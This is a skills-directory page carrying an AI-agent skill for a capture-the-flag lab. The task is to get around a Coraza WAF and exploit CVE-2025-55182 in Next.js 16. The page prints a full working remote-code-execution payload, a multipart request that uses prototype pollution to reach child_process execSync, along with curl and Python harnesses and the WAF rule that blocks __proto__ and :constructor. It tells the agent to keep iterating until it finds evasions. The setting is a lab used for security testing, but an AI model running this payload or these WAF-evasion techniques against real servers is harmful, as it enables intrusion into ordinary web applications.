waf-bypass-hunter

Bypass a Coraza WAF protecting a vulnerable Next.js 16 backend. Analyze parser differentials between Go (WAF) and Node.js (backend) to find bypasses.

Safety Notice

This listing is imported from skills.sh public index metadata. Review upstream SKILL.md and repository scripts before running.

Copy this and send it to your AI assistant to learn

Install skill "waf-bypass-hunter" with this command: npx skills add hacktronai/skills/hacktronai-skills-waf-bypass-hunter

WAF Bypass Hunter

Objective

Bypass the WAF to execute the CVE-2025-55182 exploit payload and capture the flag.

Architecture

┌─────────┐    ┌─────────────┐    ┌─────────────────┐
│  Agent  │───▶│ Coraza WAF  │───▶│ Next.js 16.0.6  │
│         │    │ (Go)        │    │ (Node.js)       │
│         │    │ Port: 9091  │    │ Port: 3000      │
└─────────┘    └─────────────┘    └─────────────────┘

The Exploit (CVE-2025-55182)

This payload triggers RCE in Next.js 16 via prototype pollution:

POST / HTTP/1.1
Host: localhost:9091
Next-Action: x
Content-Type: multipart/form-data; boundary=yyy
Content-Length: 489

--yyy
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /flag.txt').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_formData":{"get":"$1:constructor:constructor"}}}
--yyy
Content-Disposition: form-data; name="1"

"$@0"
--yyy--

This payload is BLOCKED by the WAF because it contains:

  • :constructor
  • __proto__

Your Goal

Find as many WAF bypasses as possible. There are approximately 5 different bypass techniques that work.

For each bypass, deliver the payload such that:

  1. Bypasses WAF detection - WAF doesn't see the blocked patterns
  2. Backend parses correctly - Next.js/Busboy decodes and processes it
  3. Triggers the exploit - RCE executes and returns the flag

Each bypass exploits a different parser differential between Go and Node.js.

Testing Method

Quick PoC Testing (Direct to WAF)

Use curl or Python directly against the WAF at http://localhost:9091/:

curl --path-as-is -i -s -k -X POST \
    -H 'Host: localhost' \
    -H 'Next-Action: x' \
    -H 'Content-Type: multipart/form-data; boundary=yyy' \
    --data-binary $'--yyy\r\nContent-Disposition: form-data; name="0"\r\n\r\nYOUR_PAYLOAD_HERE\r\n--yyy--' \
    'http://localhost:9091/'

import requests

resp = requests.post(
    "http://localhost:9091/",
    headers={
        "Content-Type": "multipart/form-data; boundary=yyy",
        "Next-Action": "x"
    },
    data=payload
)
print(resp.status_code)
print(resp.headers.get("X-Action-Redirect"))  # Flag is here!
print(resp.text)

Note: The flag appears in the X-Action-Redirect response header, not the body!

Debugging (Sandbox Executor)

Use the executor only when you need WAF logs to understand why a request was blocked:

curl -X POST http://localhost:8009/execute \
  -H "Content-Type: application/json" \
  -d '{"code": "import requests\nresp = requests.post(\"http://localhost:9091/\", ...)\nprint(resp.status_code)"}'

Response includes WAF logs:

{
  "stdout": "403",
  "stderr": "",
  "waf_logs": ["[BLOCKED] Rule 1008: Prototype Pollution detected"],
  "execution_time_ms": 123
}

Example: Blocked Request

import requests

payload = '''--yyy
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","_response":{"_formData":{"get":"$1:constructor:constructor"}}}
--yyy--'''

resp = requests.post(
    "http://waf:9090/",
    headers={
        "Content-Type": "multipart/form-data; boundary=yyy",
        "Next-Action": "x"
    },
    data=payload
)
print(resp.status_code)  # 403 - Blocked by WAF
print(resp.text)

Available Source Code

Study parser implementations in sources/:

  • sources/coraza/internal/bodyprocessors/ - WAF's parser (Go)
  • sources/busboy/lib/ - Backend's parser (Node.js)
  • sources/nextjs/packages/next/src/server/ - Next.js server action handling

Success Criteria

IMPORTANT: A bypass is ONLY valid if the flag is successfully read.

Hypothetical or theoretical bypasses do NOT count. You must:

  1. Execute the payload against the WAF
  2. Receive the flag in the response
  3. Show the captured flag as proof

For each confirmed bypass:

  • Document the technique used
  • Show the exact working payload
  • Show the captured flag

The flag may appear in:

  • Response headers (e.g., X-Action-Redirect)
  • Response body
  • Error messages

The flag format is HACKTRON{...}

WAF Rules (what you're bypassing)

# Block prototype pollution patterns
SecRule REQUEST_BODY|ARGS "@rx (?:__proto__|:constructor)" "id:1008,deny"

Approach

  1. Analyze source code in sources/
  2. Identify where Go and Node.js parse differently
  3. Craft payload that exploits the differential
  4. Test PoC directly against WAF at localhost:9091
  5. If blocked, use executor to get WAF logs and understand why
  6. Iterate until flag is captured
  7. If a technique doesn't work, move on - read more code, look for alternative differentials
  8. Keep hunting - find more bypasses using different techniques!

Source Transparency

This detail page is rendered from real SKILL.md content. Trust labels are metadata-based hints, not a safety guarantee.

Open in GitHubOpen in ClawHub

Related Skills

Related by shared tags or category signals.

General

ctf-solver

No summary provided by upstream source.

Repository SourceNeeds Review
-55
hacktronai
General

patch-diff-analyzer

No summary provided by upstream source.

Repository SourceNeeds Review
-20
hacktronai
Security

Skill Safe Install

L0 级技能安全安装流程。触发“安装技能/安全安装/审查权限”时,强制执行 Step0-5(查重→检索→审查→沙箱→正式安装→白名单)。

Registry SourceRecently Updated
0374
Profile unavailable